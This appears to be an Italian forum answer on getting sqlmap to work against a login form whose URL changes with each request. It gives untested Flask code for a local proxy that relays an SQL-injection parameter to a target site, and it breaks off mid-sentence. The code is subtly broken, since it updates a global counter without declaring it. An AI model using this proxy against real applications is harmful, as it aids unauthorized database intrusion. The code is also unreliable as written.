Gli strumenti raramente sono scritti in modo generico per gestire casi di test oscuri. Potrebbe essere allettante dare la colpa allo strumento per i suoi difetti, ma più spesso il problema è oscuro / non generico e dovrebbe essere risolto con altri mezzi.
Puoi risolvere questo problema creando una piccola webapp che funge da proxy tra l'applicazione di destinazione e il tuo strumento.
Lo strumento accetta l'input vulnerabile come parametro e lo inoltra all'applicazione come richiesto.
Ecco un codice python / flask non testato per illustrare come ciò può essere fatto:
from flask import Flask, request
import requests
i = 0
app = Flask(__name__)
@app.route("/")
def app_proxy():
sqli = request.args.get("sqli",None)
data = {"somekey":"someval","vulnerableparam":sqli}
resp = requests.post("http://target.com/login?%s-%s.FormSubmit"%(i,i+1),data=data)
i += 1
return resp.text, resp.status_code
app.run(host="127.0.0.1",port=8008)
Dopo aver avviato l'applicazione flask, dovresti essere in grado di usare sqlmap contro link